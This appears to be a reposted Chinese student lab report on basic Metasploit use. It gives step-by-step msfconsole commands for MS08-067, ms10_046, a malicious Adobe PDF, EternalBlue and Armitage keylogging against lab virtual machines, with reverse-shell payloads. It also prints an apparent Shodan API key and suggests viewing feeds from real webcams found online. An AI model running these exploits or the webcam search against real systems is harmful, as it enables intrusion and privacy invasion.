2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用

一.原理与实践说明

1.实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
  • 一个主动攻击实践,如ms08-067; (1分)

  • 一个针对浏览器的攻击,如ms11-050;(1分)

  • 一个针对客户端的攻击,如Adobe;(1分)

  • 成功应用任何一个辅助模块。(0.5分)

    基础问题回答

  • exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。
  • payload就是需要传送到靶机上的攻击代码本身。

  • encode是对攻击代码进行完善,伪装,使其能正常运行并且尽量躲避AV的查杀

    二.实践过程记录

    1.Windows服务渗透攻击——MS08-067安全漏洞

  • 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)

    实验步骤

  • 在kali终端中开启msfconsole。
  • 输入命令earch ms08_067,会显示出找到的渗透模块,如下图所示
  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用
  • 输入show payloads查看攻击载荷
  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷
  • 输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分
  • 输入命令set LHOST 192.168.56.102
  • 输入命令set LHOST 192.168.56.133
  • 使用命令show options再次查看payload状态。
  • 输入命令exploit开始攻击,如下图所示是正常攻击成功结果

2.浏览器渗透攻击--ms10_046(靶机Windowsxp)

实验步骤(安照1的步骤)

  • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  • 输入set payload windows/meterpreter/reverse_tcp
  • 查看要输入的参数show options
  • 输入set LHOST 192.168.56.134
  • 开始攻击exploit
  • http://192.168.56.134:80/在靶机winxp中打开
  • 查看会话
  • 输入sessions -i 1即可选择第一个会话,然后就攻击成功

3、针对Adobe Reader软件的渗透攻击——adobe_toolbutton

在kali终端中开启msfconsole。

  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
  • 输入命令show options显示我们需要在攻击前需要设置的数据

  • 输入命令
set FILENAME 20165334.pdf
set LHOST 192.168.56.134
  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
  • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
  • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令set LPORT 4444和攻击模块里的数据设置为一样的
  • 使用命令`exploit开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图

4、gather/shodan_search查找网络摄像头

  • use auxiliary/gather/shodan_search使用辅助模块
  • 查看需要输入的参数show options
  • shodan官网注册账号,登陆查看账户API后设置APIKEY set HMPSAwYSzIjRw3Agj5QWWn0OfDLRnECi
  • set QUERY "webcamXP"
  • 执行:run
  • 随机挑选一个P:Port,复制到浏览器中看看可不可以看到画面
  • 5、利用nmap --script=vuln 靶机ip辅助探测系统存在的漏洞

  • 查看可用模块 exploit/windows/smb/ms17_010_eternalblue
  • 输入攻击参数 set RHOSTS 192.168.56.135
  • 执行攻击 exploit
  • 攻击过于猛烈导致winxp直接重启

使用Armitage进行渗透测试(唯一)

  • 使用Nmap扫描主机操作系统,扫描完后会自动显示系统图标
  • 点击Find Attacks查找可用的漏洞.
  • 右键目标,选择smb目录下的ms08_067漏洞

  • 这里Armitage默认帮我们配置好了,可以直接点击Launch
  • 出现闪电代表攻击成功
  • 在命令行中输入shell便可以与目标机器进行交互

    选择Log Keystrokes进行键盘记录

  • 在xp中输入以下内容
  • kali 一字不漏地记录下来

    还可以对xp进行截屏操作(恐怖如斯)

实验总结

  • 无数次的失败,归因于缺乏思考,随便攻击,所以攻击前一定要查看靶机是否存在相关漏洞
    可以利用nmap --script=vuln 靶机ip查看系统存在漏洞。

转载于:https://www.cnblogs.com/ltl123/p/10702227.html

2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用相关推荐

  1. 2017-2018-2 20155314《网络对抗技术》Exp5 MSF基础应用

    2017-2018-2 20155314<网络对抗技术>Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤--基于Armitage的MSF自动化漏洞攻击实 ...

  2. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  3. 2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用

    实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践(1分) ms08_067; (失败) MS17-010永 ...

  4. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  5. 20155308『网络对抗技术』Exp7:网络欺诈防范

    20155308『网络对抗技术』Exp7:网络欺诈防范 原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2.实践内容概述 简单应用SET ...

  6. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  7. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践

    2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...

  8. 2019-2020-2 20175 212童皓桢《网络对抗技术》Exp6 MSF基础应用

    2019-2020-2 20175212童皓桢<网络对抗技术> Exp6 MSF基础应用 目录 1. 实验目标 2. 实验内容 2.1 主动攻击实践 2.2 针对浏览器的攻击 2.3 针对 ...

  9. 2018-2019-2 20165212《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165212<网络攻防技术>Exp5 MSF基础应用 攻击成果 主动攻击的实践 ms17010eternalblue payload windows/x64/m ...

最新文章

  1. 磁盘剩余空间策略_如何无损扩展C盘空间大小,这一招足够!
  2. QT的QSvgGenerator类的使用
  3. 数字光端机和模拟视频光端机的六个不同点
  4. 正则表达式常用符号所代表的含义
  5. ASP.NET中TextBox控件的AutoCompleteType属性(不保存历史输入记录)
  6. 路考计算机系统评判,科目三智能考试有效解决路考舞弊行为
  7. MapXtreme2004 连接oracle spatial的问题
  8. 二叉树的创建及遍历_递归遍历_非递归遍历
  9. linux 0.11 内核学习 -- sched.c,调度进程。
  10. 数据结构串的基本操作及KMP算法
  11. 判断字符串是否是有效的手机号码
  12. SQL Server 2019重新安装失败的处理方法
  13. 深度学习面试问题总结
  14. java中的this是什么意思
  15. 双击桌面计算机打不开硬盘,双击硬盘盘符打不开只能右键打开的解决方法 -电脑资料...
  16. IT战略规划,我们在做什么?(上)
  17. 开关电源设计实例之Boost 篇
  18. 高速公路联网收费二义性路径识别系统原理及开发
  19. Java中按字母顺序对字符串字符进行排序的4种不同方法
  20. 如何顺利接手一个中途的项目

热门文章

  1. 原来还会有这样的事!
  2. windows 7使用GPO统一桌面黑屏
  3. 成都拓嘉辰丰:商家在申请多多买菜提货点时该如何做?
  4. HTTP 206和HTTP 502
  5. SA实战 ·《SpringCloud Alibaba实战》第03章-微服务介绍
  6. 【GitHubShare】一种强大、实时、高分辨率的人物视频抠图方法,使用循环神经网络
  7. 点滴浓缩洁净,洗衣液行业的破局之路
  8. 共享的信用麻烦:谁该具有处罚量刑权?
  9. sock5系列之简单测试sock5 连通性!(二)
  10. unity小游戏---跑酷游戏